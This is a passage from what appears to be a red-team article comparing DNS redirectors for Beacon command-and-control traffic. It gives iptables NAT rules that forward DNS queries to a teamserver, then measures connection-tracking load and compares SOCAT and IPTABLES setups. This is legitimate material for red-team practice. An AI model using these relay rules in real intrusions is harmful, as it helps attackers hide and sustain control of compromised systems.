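    # Equivalent to writing "1" to /proc/sys/net/ipv4/ip_forward
    echo "sysctl -w net.ipv4.ip_forward=1"
    # Mark new DNS queries addressed to the redirector
    echo "iptables -t nat -A PREROUTING -m state --state NEW --protocol udp --destination ${redirector_ip} --destination-port 53 -j MARK --set-mark ${mark}"
    # Rewrite destination (DNAT) and source (MASQUERADE) of marked packets
    echo "iptables -t nat -A PREROUTING -m mark --mark ${mark} --protocol udp -j DNAT --to-destination ${teamserver_ip}:53"
    echo "iptables -t nat -A POSTROUTING -m mark --mark ${mark} -j MASQUERADE"
}

# Example with placeholder addresses: review the output first
redirector_rules 192.0.2.10 198.51.100.20
```

Once the printed commands look right, they can be run as root, for example by piping the output to sh.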

Evaluating the capabilities listed in the proc filesystem, we see that we have 65,536 entries in the translation table (/proc/sys/net/netfilter/nf_conntrack_max) and 16,384 buckets (/proc/sys/net/netfilter/nf_conntrack_buckets). This indicates that even at peak capacity, the lookups should be quick. These are default values and can easily be changed by writing a new number to the file, if necessary.
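
To see why lookups should stay quick, it helps to divide the table size by the number of buckets. The sketch below does this with the values quoted above; the function name entries_per_bucket is an assumption for illustration. The result is only a rough ratio, and the kernel’s actual chain lengths may differ depending on how entries are hashed.

```shell
#!/bin/sh
# Rough average number of entries per hash bucket when the table is full.
# $1 = maximum entries, $2 = number of buckets
entries_per_bucket() {
    echo $(( $1 / $2 ))
}

# Values quoted in the text
entries_per_bucket 65536 16384

# On a live system, the same ratio can be read from the proc filesystem:
# entries_per_bucket "$(cat /proc/sys/net/netfilter/nf_conntrack_max)" \
#                    "$(cat /proc/sys/net/netfilter/nf_conntrack_buckets)"
```

With the default values, this works out to about four entries per bucket at full capacity.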

The system keeps track of the traffic passing through the redirector, so no action is needed for returning packets since they are translated back automatically.

To evaluate the performance of the redirector, we can measure the number of active NAT entries and how this number changes as the system is loaded. To measure this, we can read /proc/sys/net/netfilter/nf_conntrack_count.
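
One way to collect these measurements is to poll the counter at a fixed interval and record each value with a timestamp. The following is a minimal sketch, not the tooling used for the experiment; the function name sample_conntrack and the log format are assumptions.

```shell
#!/bin/sh
# Hypothetical sampler: print "<epoch seconds> <count>" a fixed number of times.
# $1 = file to read, $2 = number of samples, $3 = seconds between samples
sample_conntrack() {
    file=$1
    samples=$2
    interval=$3
    i=0
    while [ "$i" -lt "$samples" ]; do
        echo "$(date +%s) $(cat "$file")"
        i=$((i + 1))
        # Sleep only between samples, not after the last one
        if [ "$i" -lt "$samples" ]; then
            sleep "$interval"
        fi
    done
    return 0
}

# Example (on the redirector): one sample per second for five minutes
# sample_conntrack /proc/sys/net/netfilter/nf_conntrack_count 300 1 > conntrack.log
```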

Our experiment starts with a Beacon signaling at 15 second intervals. The Beacon is then made to signal continuously, followed by a high activity period. Once this activity period is over, the Beacon is reconfigured to its initial value of 15 seconds between polls.

In the test above we can see that the number of occupied slots depends on the network activity. With just one Beacon polling at 15 second intervals, the number of conntrack slots in use is less than 10. If we switch to no delay, the value quickly grows to about 500, depending on available throughput. When heavy activity is requested, the number of connection states steadily rises to 2500 and plateaus at 2700. Once activity ceases, the tracked connections decrease until around 90 seconds, at which point they have all expired and the value stabilizes below 10.
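
Figures like the plateau can be pulled out of recorded samples with a short awk filter. This sketch assumes the samples were logged as one "<epoch seconds> <count>" pair per line, which is an assumed format rather than the one used in the experiment, and the function name conntrack_peak is likewise hypothetical.

```shell
#!/bin/sh
# Hypothetical summary of a "<epoch seconds> <count>" log read from stdin:
# prints the peak count and the timestamp at which it was first seen.
conntrack_peak() {
    awk 'NR == 1 || $2 + 0 > peak { peak = $2 + 0; at = $1 }
         END { if (NR > 0) print "peak=" peak " at=" at }'
}

# Example usage with a log file recorded earlier:
# conntrack_peak < conntrack.log
```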

IPTABLES redirectors perform quite well with very modest resources, even with default settings. This is not surprising, given the nature of the Linux kernel. Redirectors like this one can easily be deployed on the smallest computers or cloud instances. IPTABLES redirectors, once set up, are pretty much foolproof.

Summary

In this article, we saw three different implementations of DNS Beacon redirectors. Though these implementations have different advantages and disadvantages, they are ultimately all very usable.

The IPTABLES based redirector is the quickest with the smallest footprint, being included by default in the kernel, and needing just four commands.

The SOCAT based redirectors are similar, the main difference being whether traffic is converted to TCP or not. UDP redirectors are the simplest, but TCP redirectors have the advantage that TCP connections are easier to encapsulate, which helps in special cases, such as when the traffic must be tunneled via SSH.

Resource usage Speed Versatility Ease of Use Stability
SOCAT TCP 0 ++ + 0
SOCAT UDP + + + ++ +
IPTABLES ++ ++ 0 ++ ++